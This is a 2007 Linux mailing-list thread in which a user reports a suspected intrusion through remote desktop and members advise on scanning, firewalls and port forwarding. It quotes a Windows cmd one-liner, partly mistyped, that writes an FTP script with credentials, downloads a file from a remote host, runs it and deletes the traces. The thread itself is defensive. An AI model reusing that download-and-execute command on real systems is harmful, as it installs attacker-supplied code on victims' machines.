[Dclug] Whats happening here? Is this a hacking attempt?
macoafi at gmail.com
Sat Mar 31 01:33:34 EDT 2007
I've heard as low as 8 minutes for a Windows computer to be compromised.
On 3/30/07, Mike Vore <mike at vorefamily.net> wrote:
> Arun Mallikarjunan wrote:
> > Hi again,
> > I had mentioned before that my moms(she lives in Chennai, India)
> > using Ubuntu edgy for about 8 months now without any issues. Last week
> > she wanted me to show her how to rip music off of the CD's !!. I asked
> > to enable remote desktop and showed her how to use the extractor. Well,
> > the next she came online and told me that somebody was trying to take
> > control of her computer. I told her that thats not possible. then she
> > sent me this piece of code
> > run %systemroot%\system32\cmd.exe
> > cmd /c echo open oki 21 >> ik &echo user u2m6g k3bmt >> ik &echo binary
> > >> ik &echo get asd >> ik &echo bye >>w ikh &fotp -n -v -s:ik &diels ik
> > &asd &exit
> > I was a little surprised at seeing these messages. They are certainly
> > related to windows which she doesnt use and I dont either.
> > The next day when she came online she said that 126.96.36.199
> > <http://188.8.131.52> was trying to take control and 5 minutes later
> > she said 184.108.40.206 <http://220.127.116.11> was. I looked these IP
> > http://www.ip-adress.com/ and they seem to be coming from germany and
> > taiwan. I made her turn off the remote desktop and she hasnt seen it
> > Here are my Q's:
> > 1. How did they find her?
> They may not be attacking 'her', just an IP address.
> > 2. she doesnt leave the comp on. how are they finding her. She does have
> > addns script which updates dyndns.org <http://dyndns.org>. if thats the
> > case how did they find out her dyndns name.
> Same answer. I once setup a school on their T1 Class-C (24bit) network. I
> watched the input to the firewall - within just minutes of going on the
> there were about a dozen port-scans on each of the addresses in the
> range. Anyone with nmap can start an address or port scan on just about
> any IP
> > 3. What can I do to check if they have gotten in?
> It would probably take more time to check than to wipe the disk clean and
> > 4. What to do to stop them from getting in? I am going to install a
> > firewall, any particular one in mind? The problem is that I have to
> > install it and then I have to instruct her to open ports which is why it
> > needs to be simple enough for her to understand.
> Install a Firewall IMMEDIATELY. Unless/Until she needs to act as a server
> there is almost no need for opening any port for inbound traffic. But if
> does need something like SSH to access from her office, put it on a high
> and have the firewall not only do NAT but Port Forwarding. For instance I
> have my inbound SSH on port XXXX and have the Firewall/Router translate it
> my 'big iron' on port 22. Also setup incoming filtering to only allow
> your IP
> number (if you have a fixed one) or you ISP's subnet, for example if you
> using Verizon FiOS you may find that you are using numbers in the
> 71.245.xxx.yyy range. setting the filter to 71.245/16 won't stop everyone,
> it will keep anyone not on Verizon's net out. Set up all incoming services
> that you need - like remote desktop to use high numbers and do Port
> - not a lot of help but it will keep someone from using default settings.
> When I started using FiOS and allowed port 22 (SSH) through I had many
> attempts, but none after I use the high port number with Port-Forwarding.
> NEVER put any unprotected computer directly on the net. I think the time
> a virgin windows system to become compromised is now under 20 minutes.
> That's my take on the situation, YMMV. Others may
> Mike Vore
> Dclug mailing list
> Dclug at calypso.tux.org
Linux User # 432169
Hey, type this in the terminal! It's really fun!
aptitude -v moo
just keep adding v's to that and watch it change
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the Dclug